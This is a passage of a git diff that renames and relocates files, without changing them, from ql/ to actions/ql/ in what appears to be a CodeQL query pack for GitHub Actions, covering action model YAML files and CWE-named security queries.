ql/lib/ext/manual/py-actions_flake8.model.yml rename to actions/ql/lib/ext/manual/py-actions_flake8.model.yml diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml similarity index 100% rename from ql/lib/ext/manual/py-actions_py-dependency-install.model.yml rename to actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml similarity index 100% rename from ql/lib/ext/manual/pyo3_maturin-action.model.yml rename to actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml similarity index 100% rename from ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml rename to actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/actions/ql/lib/ext/manual/read-file-actions.model.yml similarity index 100% rename from ql/lib/ext/manual/read-file-actions.model.yml rename to actions/ql/lib/ext/manual/read-file-actions.model.yml diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml similarity index 100% rename from ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml rename to actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml similarity index 100% rename from ql/lib/ext/manual/reggionick_s3-deploy.model.yml rename to actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/actions/ql/lib/ext/manual/release-kit_regex.model.yml similarity index 100% rename from ql/lib/ext/manual/release-kit_regex.model.yml rename to actions/ql/lib/ext/manual/release-kit_regex.model.yml diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/renovatebot_github-action.model.yml rename to actions/ql/lib/ext/manual/renovatebot_github-action.model.yml diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml similarity index 100% rename from ql/lib/ext/manual/rishabh510_path-lister-action.model.yml rename to actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml similarity index 100% rename from ql/lib/ext/manual/roots_issue-closer-action.model.yml rename to actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml similarity index 100% rename from ql/lib/ext/manual/ros-tooling_setup-ros.model.yml rename to actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml similarity index 100% rename from ql/lib/ext/manual/ruby_setup-ruby.model.yml rename to actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml similarity index 100% rename from ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml rename to actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml similarity index 100% rename from ql/lib/ext/manual/sergeysova_jq-action.model.yml rename to actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml similarity index 100% rename from ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml rename to actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml similarity index 100% rename from ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml rename to actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml similarity index 100% rename from ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml rename to actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml similarity index 100% rename from ql/lib/ext/manual/snow-actions_eclint.model.yml rename to actions/ql/lib/ext/manual/snow-actions_eclint.model.yml diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml similarity index 100% rename from ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml rename to actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml similarity index 100% rename from ql/lib/ext/manual/step-security_harden-runner.model.yml rename to actions/ql/lib/ext/manual/step-security_harden-runner.model.yml diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml similarity index 100% rename from ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml rename to actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml similarity index 100% rename from ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml rename to actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/actions/ql/lib/ext/manual/tibdex_backport.model.yml similarity index 100% rename from ql/lib/ext/manual/tibdex_backport.model.yml rename to actions/ql/lib/ext/manual/tibdex_backport.model.yml diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml similarity index 100% rename from ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml rename to actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml similarity index 100% rename from ql/lib/ext/manual/timheuer_base64-to-file.model.yml rename to actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml similarity index 100% rename from ql/lib/ext/manual/tj-actions_branch-names.model.yml rename to actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml similarity index 100% rename from ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml rename to actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml similarity index 100% rename from ql/lib/ext/manual/trilom_file-changes-action.model.yml rename to actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml similarity index 100% rename from ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml rename to actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml similarity index 100% rename from ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml rename to actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml similarity index 100% rename from ql/lib/ext/manual/tzkhan_pr-update-action.model.yml rename to actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml similarity index 100% rename from ql/lib/ext/manual/veracode_veracode-sca.model.yml rename to actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml similarity index 100% rename from ql/lib/ext/manual/w3f_action-find-old-files.model.yml rename to actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml similarity index 100% rename from ql/lib/ext/manual/wearerequired_lint-action.model.yml rename to actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml similarity index 100% rename from ql/lib/ext/manual/webfactory_ssh-agent.model.yml rename to actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml similarity index 100% rename from ql/lib/ext/manual/xom9ikk_dotenv.model.yml rename to actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml similarity index 100% rename from ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml rename to actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml similarity index 100% rename from ql/lib/ext/manual/yumemi-inc_changed-files.model.yml rename to actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml similarity index 100% rename from ql/lib/ext/manual/zaproxy_action-baseline.model.yml rename to actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml similarity index 100% rename from ql/lib/ext/manual/zaproxy_action-full-scan.model.yml rename to actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml similarity index 100% rename from ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml rename to actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql similarity index 100% rename from ql/lib/ide-contextual-queries/printAst.ql rename to actions/ql/lib/ide-contextual-queries/printAst.ql diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql similarity index 100% rename from ql/lib/ide-contextual-queries/printCfg.ql rename to actions/ql/lib/ide-contextual-queries/printCfg.ql diff --git a/ql/lib/qlpack.yml b/actions/ql/lib/qlpack.yml similarity index 100% rename from ql/lib/qlpack.yml rename to actions/ql/lib/qlpack.yml diff --git a/ql/src/Debug/SyntaxError.ql b/actions/ql/src/Debug/SyntaxError.ql similarity index 100% rename from ql/src/Debug/SyntaxError.ql rename to actions/ql/src/Debug/SyntaxError.ql diff --git a/ql/src/Debug/partial.ql b/actions/ql/src/Debug/partial.ql similarity index 100% rename from ql/src/Debug/partial.ql rename to actions/ql/src/Debug/partial.ql diff --git a/ql/src/Models/CompositeActionsSinks.ql b/actions/ql/src/Models/CompositeActionsSinks.ql similarity index 100% rename from ql/src/Models/CompositeActionsSinks.ql rename to actions/ql/src/Models/CompositeActionsSinks.ql diff --git a/ql/src/Models/CompositeActionsSources.ql b/actions/ql/src/Models/CompositeActionsSources.ql similarity index 100% rename from ql/src/Models/CompositeActionsSources.ql rename to actions/ql/src/Models/CompositeActionsSources.ql diff --git a/ql/src/Models/CompositeActionsSummaries.ql b/actions/ql/src/Models/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Models/CompositeActionsSummaries.ql rename to actions/ql/src/Models/CompositeActionsSummaries.ql diff --git a/ql/src/Models/ReusableWorkflowsSinks.ql b/actions/ql/src/Models/ReusableWorkflowsSinks.ql similarity index 100% rename from ql/src/Models/ReusableWorkflowsSinks.ql rename to actions/ql/src/Models/ReusableWorkflowsSinks.ql diff --git a/ql/src/Models/ReusableWorkflowsSources.ql b/actions/ql/src/Models/ReusableWorkflowsSources.ql similarity index 100% rename from ql/src/Models/ReusableWorkflowsSources.ql rename to actions/ql/src/Models/ReusableWorkflowsSources.ql diff --git a/ql/src/Models/ReusableWorkflowsSummaries.ql b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql similarity index 100% rename from ql/src/Models/ReusableWorkflowsSummaries.ql rename to actions/ql/src/Models/ReusableWorkflowsSummaries.ql diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql similarity index 100% rename from ql/src/Security/CWE-074/OutputClobberingHigh.ql rename to actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md similarity index 100% rename from ql/src/Security/CWE-077/EnvPathInjectionCritical.md rename to actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql similarity index 100% rename from ql/src/Security/CWE-077/EnvPathInjectionCritical.ql rename to actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md similarity index 100% rename from ql/src/Security/CWE-077/EnvPathInjectionMedium.md rename to actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql similarity index 100% rename from ql/src/Security/CWE-077/EnvPathInjectionMedium.ql rename to actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md similarity index 100% rename from ql/src/Security/CWE-077/EnvVarInjectionCritical.md rename to actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql similarity index 100% rename from ql/src/Security/CWE-077/EnvVarInjectionCritical.ql rename to actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md similarity index 100% rename from ql/src/Security/CWE-077/EnvVarInjectionMedium.md rename to actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql similarity index 100% rename from ql/src/Security/CWE-077/EnvVarInjectionMedium.ql rename to actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql similarity index 100% rename from ql/src/Security/CWE-078/CommandInjectionCritical.ql rename to actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql similarity index 100% rename from ql/src/Security/CWE-078/CommandInjectionMedium.ql rename to actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md similarity index 100% rename from ql/src/Security/CWE-088/ArgumentInjectionCritical.md rename to actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql similarity index 100% rename from ql/src/Security/CWE-088/ArgumentInjectionCritical.ql rename to actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md similarity index 100% rename from ql/src/Security/CWE-088/ArgumentInjectionMedium.md rename to actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql similarity index 100% rename from ql/src/Security/CWE-088/ArgumentInjectionMedium.ql rename to actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md similarity index 100% rename from ql/src/Security/CWE-094/CodeInjectionCritical.md rename to actions/ql/src/Security/CWE-094/CodeInjectionCritical.md diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql similarity index 100% rename from ql/src/Security/CWE-094/CodeInjectionCritical.ql rename to actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md similarity index 100% rename from ql/src/Security/CWE-094/CodeInjectionMedium.md rename to actions/ql/src/Security/CWE-094/CodeInjectionMedium.md diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql similarity index 100% rename from ql/src/Security/CWE-094/CodeInjectionMedium.ql rename to actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md similarity index 100% rename from ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md rename to actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql similarity index 100% rename from ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql rename to actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql similarity index 100% rename from ql/src/Security/CWE-200/SecretExfiltration.ql rename to actions/ql/src/Security/CWE-200/SecretExfiltration.ql diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md similarity index 100% rename from ql/src/Security/CWE-275/MissingActionsPermissions.md rename to actions/ql/src/Security/CWE-275/MissingActionsPermissions.md diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql similarity index 100% rename from ql/src/Security/CWE-275/MissingActionsPermissions.ql rename to actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql similarity index 100% rename from ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql rename to actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md similarity index 100% rename from ql/src/Security/CWE-285/ImproperAccessControl.md rename to actions/ql/src/Security/CWE-285/ImproperAccessControl.md diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql similarity index 100% rename from ql/src/Security/CWE-285/ImproperAccessControl.ql rename to actions/ql/src/Security/CWE-285/ImproperAccessControl.ql diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md similarity index 100% rename from ql/src/Security/CWE-312/ExcessiveSecretsExposure.md rename to actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql similarity index 100% rename from ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql rename to actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md similarity index 100% rename from ql/src/Security/CWE-312/SecretsInArtifacts.md rename to actions/ql/src/Security/CWE-312/SecretsInArtifacts.md diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql similarity index 100% rename from ql/src/Security/CWE-312/SecretsInArtifacts.ql rename to actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md similarity index 100% rename from ql/src/Security/CWE-312/UnmaskedSecretExposure.md rename to actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql similarity index 100% rename from ql/src/Security/CWE-312/UnmaskedSecretExposure.ql rename to actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md rename to actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql rename to actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md rename to actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql rename to actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md rename to actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql similarity index 100% rename from ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql rename to actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql rename to actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md similarity index 100% rename from ql/src/Security/CWE-829/ArtifactPoisoningCritical.md rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql similarity index 100% rename from ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md similarity index 100% rename from ql/src/Security/CWE-829/ArtifactPoisoningMedium.md rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql similarity index 100% rename from ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql similarity index 100% rename from ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql rename to actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md similarity index 100% rename from ql/src/Security/CWE-829/UnpinnedActionsTag.md rename to actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql similarity index 100% rename from ql/src/Security/CWE-829/UnpinnedActionsTag.ql rename to actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md 